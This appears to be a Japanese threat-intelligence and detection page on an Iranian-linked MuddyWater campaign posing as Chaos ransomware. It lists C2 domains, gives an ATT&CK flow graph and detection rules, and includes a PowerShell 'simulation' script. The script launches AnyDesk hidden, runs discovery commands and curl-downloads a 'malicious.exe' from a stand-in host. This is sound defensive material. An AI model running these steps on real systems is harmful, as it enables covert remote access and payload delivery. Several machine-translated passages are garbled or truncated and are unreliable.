フォローする 
概要
2026年初頭、最初は通常のChaosランサムウェアの事件として現れたものが、後にイラン国家に関連するMuddyWater(またはSeedworm)というグループに結びついた偽旗作戦であることが判明しました。攻撃者はファイルの暗号化ではなく、Microsoft Teamsを利用したソーシャル・エンジニアリング、資格情報やMFAトークンの盗難、カスタムのダウンローダとリモートアクセス型トロイの木馬を展開しました。この作戦では、MuddyWaterに関連するインフラストラクチャが再利用され、コード署名証明書を含み、データの窃盗や長期的な持続的アクセスを目的としていました。
調査
Rapid7の調査員は、Teamsを基点とした資格情報の盗難から、AnyDeskやDWAgentといった正当なリモート管理ツールの使用を経て、次の配信に至る侵入チェーンを再構築しました。 ms_upd.exeを取得し、カスタムRATである Game.exeをダウンロードさせた。このチームは、以下のようなコマンド・アンド・コントロールドメインを特定しました: moonzonet.com and uploadfiler.comを含む、複数の関連IPアドレスや、以前にMuddyWaterに関連付けられた署名証明書。マルウェア分析では、アンチ分析の挙動、単一の実行を保証するためのミューテックス、サービスと隠しファイルに関与する持続的メカニズムも明らかになった。
緩和策
企業は、より強固なMFA保護を強制し、リモートデスクトップアクセスおよびTeamsの画面共有を信頼されたアカウントに制限し、正当なリモートアクセスツールが不審な状況で使用されている場合を監視する必要があります。コード署名されたバイナリに対してはアプリケーション許可リストを適用し、ユーザーがアクセス可能なディレクトリからの非署名ファイルの実行を禁止する必要があります。セキュリティチームは、証明書の使用状況を定期的に監査し、キャンペーンに関連する既知の悪意のあるドメインおよびIPアドレスをブロックすべきです。
対応策
この活動が検出された場合、直ちに影響を受けたシステムを隔離し、侵害された資格情報とMFAトークンを無効化し、完全な法医学的収集を開始する必要があります。特定されたコマンド・アンド・コントロールのインフラをブロックし、AnyDeskとDWAgentのサービスを削除し、カスタムRATを環境から取り除くべきです。ミューテックス ATTRIBUTES_ObjectKernel 及び ProgramData.
"graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% ノード – Actions action_initial_access["<b>アクション</b> – <b>T1566 フィッシング</b><br/>攻撃者は、ユーザーを偽のQuick Assist画面共有セッションに誘導する悪意のあるMicrosoft Teamsチャットメッセージを送信しました。"] class action_initial_access action action_user_exec_link["<b>アクション</b> – <b>T1204.001 ユーザー実行: 悪意のあるリンク</b><br/>被害者は、Teams経由で配信された悪意のあるリンクをクリックして、<i>ms_upd.exe</i>のダウンロードを開始しました。"] class action_user_exec_link action action_user_exec_copypaste["<b>アクション</b> – <b>T1204.004 ユーザー実行: 悪意のあるコピー・ペースト</b><br/>攻撃者は、ユーザーにローカルに作成したテキストファイルに資格情報をコピー・ペーストするよう指示しました。"] class action_user_exec_copypaste action action_cred_access["<b>アクション</b> – <b>T1552.008 認証された資格情報</b> & <b>T1078 有効なアカウント</b><br/>チャットメッセージから収集した資格情報を使って内部システムにログインしました。"] class action_cred_access action action_auth_mod["<b>アクション</b> – <b>T1556.001 ドメインコントローラー認証</b><br/>侵害された資格情報を使用して、特権アクセスを獲得しました。"] class action_auth_mod action action_discovery["<b>アクション</b> – <b>T1082 システム情報の特定</b> & <b>T1016 システムネットワーク構成の探索</b><br/>マルウェアは、ホスト名、ユーザー名、ドメイン、IPアドレスを収集しました。"] class action_discovery action action_ingress_transfer["<b>アクション</b> – <b>T1105 ツールの移動</b><br/><i>ms_upd.exe</i>はcurlを使用して追加ペイロードをダウンロードしました。"] class action_ingress_transfer action action_execution["<b>アクション</b> – <b>T1059 コマンドおよびスクリプトインタープリタ</b><br/>攻撃者は、cmd.exe、PowerShell、およびpythonw.exeを実行してダウンロードしたバイナリを実行しました。"] class action_execution action action_process_injection["<b>アクション</b> – <b>T1055.011 ウィンドウメモリの余分注入</b> & <b>T1055.002 ポータブル実行可能注入</b><br/>pythonw.exeはサスペンドされたプロセスにコードをインジェクトして、RATを隠密に実行しました。"] class action_process_injection action action_defense_evasion["<b>アクション</b> – <b>T1027 誤字ファイルまたは情報</b> & <b>T1497 仮想化/サンドボックス回避</b><br/>ペイロードはXORu2011で符号化され、AESu2011256u2011GCM暗号化されました。"] class action_defense_evasion action action_persistence["<b>アクション</b> – <b>T1219 リモートアクセスツール</b><br/>DWAgentおよびAnyDeskの展開。"] class action_persistence action action_lateral_movement["<b>アクション</b> – <b>T1563 リモートサービスセッションハイジャック (RDP)</b> & <b>T1668 独占制御</b><br/>正当なRDPセッションを用いて横展開しました。"] class action_lateral_movement action action_collection_exfil["<b>アクション</b> – <b>T1560 データ収集のアーカイブ</b> & <b>T1041 C2チャネル越しのエクスフィルトレーション</b><br/>アーカイブされ、uploadfiler.comにアップロードされました。"] class action_collection_exfil action action_c2["<b>アクション</b> – <b>T1090 プロキシ</b> & <b>T1573 暗号化されたチャネル</b><br/>C2インフラストラクチャとHTTPS経由で通信しました。"] class action_c2 action %% ノード – ツール / ファイル / プロセス / マルウェア file_ms_upd["<b>ファイル</b> – <b>名前</b>: ms_upd.exe<br/><b>説明</b>: ペイロードを取得するドロッパー。"] class file_ms_upd file file_webview ["<b>ファイル</b> – <b>名前</b>: WebView2Loader.dll<br/><b>説明</b>: ウェブコンテンツのレンダリングをサポートするDLL。"] class file_webview file file_game["<b>ファイル</b> – <b>名前</b>: Game.exe<br/><b>説明</b>: ダウンロード後に実行される二次ペイロード。"] class file_game file file_visual["<b>ファイル</b> – <b>名前</b>: visualwincomp.txt<br/><b>説明</b>: 設定データに使用されるテキストファイル。"] class file_visual file process_cmd["<b>プロセス</b> – <b>名前</b>: cmd.exe<br/><b>目的</b>: コマンドラインの実行。"] class process_cmd process process_ps["<b>プロセス</b> – <b>名前</b>: PowerShell<br/><b>目的</b>: ペイロードの実行のためのPowerShellスクリプト。"] class process_ps process process_python["<b>プロセス</b> – <b>名前</b>: pythonw.exe<br/><b>目的</b>: Pythonベースのコンポーネントを実行し、プロセスのインジェクションを行います。"] class process_python process malware_dwaga["<b>マルウェア</b> – <b>名前</b>: DWAgentサービス<br/><b>目的</b>: 永続的なリモートアクセスを提供します。"] class malware_dwaga malware tool_anydesk["<b>ツール</b> – <b>名前</b>: AnyDesk<br/><b>説明</b>: 永続および横展開に利用される正当なリモートデスクトップユーティリティ。"] class tool_anydesk tool %% 接続 – フロー action_initial_access –>|リードに繋がる| action_user_exec_link action_user_exec_link –>|ダウンロード| file_ms_upd action_user_exec_link –>|リードに繋がる| action_user_exec_copypaste action_user_exec_copypaste –>|提供する| action_cred_access action_cred_access –>|可能にする| action_auth_mod action_auth_mod –>|可能にする| action_discovery action_discovery –>|トリガー| action_ingress_transfer action_ingress_transfer –>|ダウンロード| file_webview action_ingress_transfer –>|ダウンロード| file_game action_ingress_transfer –>|ダウンロード| file_visual action_ingress_transfer –>|リードに繋がる| action_execution action_execution –>|実行する| process_cmd action_execution –>|実行する| process_ps action_execution –>|実行する| process_python process_python –>|インジェクト| action_process_injection action_process_injection –>|促進する| action_defense_evasion action_defense_evasion –>|可能にする| action_persistence action_persistence –>|インストール| malware_dwaga action_persistence –>|インストール| tool_anydesk malware_dwaga –>|サポート| action_lateral_movement tool_anydesk –>|サポート| action_lateral_movement action_lateral_movement –>|収集する| action_collection_exfil action_collection_exfil –>|経由で排出する| action_c2 %% スタイリング class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "
攻撃フロー
検出
可能性のあるシステムネットワーク構成の探索(コマンドライン経由)
表示
遅延実行のためのPING使用の可能性(コマンドライン経由)
表示
代替リモートアクセス/管理ソフトウェア(プロセス生成経由)
表示
疑わしいCURLの使用(コマンドライン経由)
表示
疑わしいファイルダウンロード直接IP(プロキシ経由)
表示
IOCs (HashSha256) の検出:Chaosランサムウェアの背後にある国家支援の影
表示
IOCs (HashSha1) の検出:Chaosランサムウェアの背後にある国家支援の影
表示
IOCs (HashMd5) の検出:Chaosランサムウェアの背後にある国家支援の影
表示
IOCs (SourceIP) の検出:Chaosランサムウェアの背後にある国家支援の影
表示
IOCs (DestinationIP) の検出:Chaosランサムウェアの背後にある国家支援の影
表示
疑わしいリモート管理ツールと探索コマンドの実行 [Windows プロセス生成]
表示
インタラクティブログオンとMFA構成の変更を検出 [Microsoft Windows セキュリティイベントログ]
表示
シミュレーション実行
前提条件:テレメトリおよびベースラインプレフライトチェックが合格している必要があります。
説明:このセクションでは、検出規則をトリガーするために設計された正確な攻撃手法(TTP)の実行を詳述します。コマンドと説明は、TTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の説明とコマンド:
- リモート拠点を確立する 正当なリモート管理ツールを使用 AnyDesk.exe (「remote-tool」セレクタを反映)。
- ネットワーク偵察を行う を実行
ipconfigandwhoamiを同じセッションから—「探査コマンド」セレクタを満たします。 - 悪意のあるペイロードをダウンロード を使用
curlを介して、これは「ツール移動の流入」(T1105)および「コマンドラインインターフェイス」(T1059)のための古典的な手法です。を介して、これは「ツール移動の流入」(T1105)および「コマンドラインインターフェイス」(T1059)のための古典的な手法です。ペイロードを実行 - キルチェーンを完成させる(規則の検証には必要ありませんが、リアリズムのために含まれています)。 to complete the kill‑chain (not required for rule validation, but included for realism).
-
回帰テストスクリプト:
# ------------------------------------------------- # シミュレーションスクリプト – Sigma規則をトリガー # ------------------------------------------------- # 1. AnyDeskを起動(シミュレーション – AnyDeskがPATHにある前提) Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden # 2. 探索コマンドを実行 $discovery = @( "ipconfig /all", "whoami", "net start" ) foreach ($cmd in $discovery) { cmd.exe /c $cmd | Out-Null } # 3. cmd.exe + curlを使用してダミーペイロードを取得 $payloadUrl = "http://example.com/malicious.exe" $outputPath = "$env:TEMPpayload.exe" $downloadCmd = "curl $payloadUrl -o $outputPath" cmd.exe /c $downloadCmd # オプション:ペイロードを実行(安全のためコメントアウト) # Start-Process -FilePath $outputPath -WindowStyle Hidden # ------------------------------------------------- -
クリーンアップコマンド:
# AnyDesk起動時に終了 Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force # ダウンロードしたペイロードを削除 Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # スクリプトによって作成された残りのcmd.exeインスタンスを消去 Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force
報告終了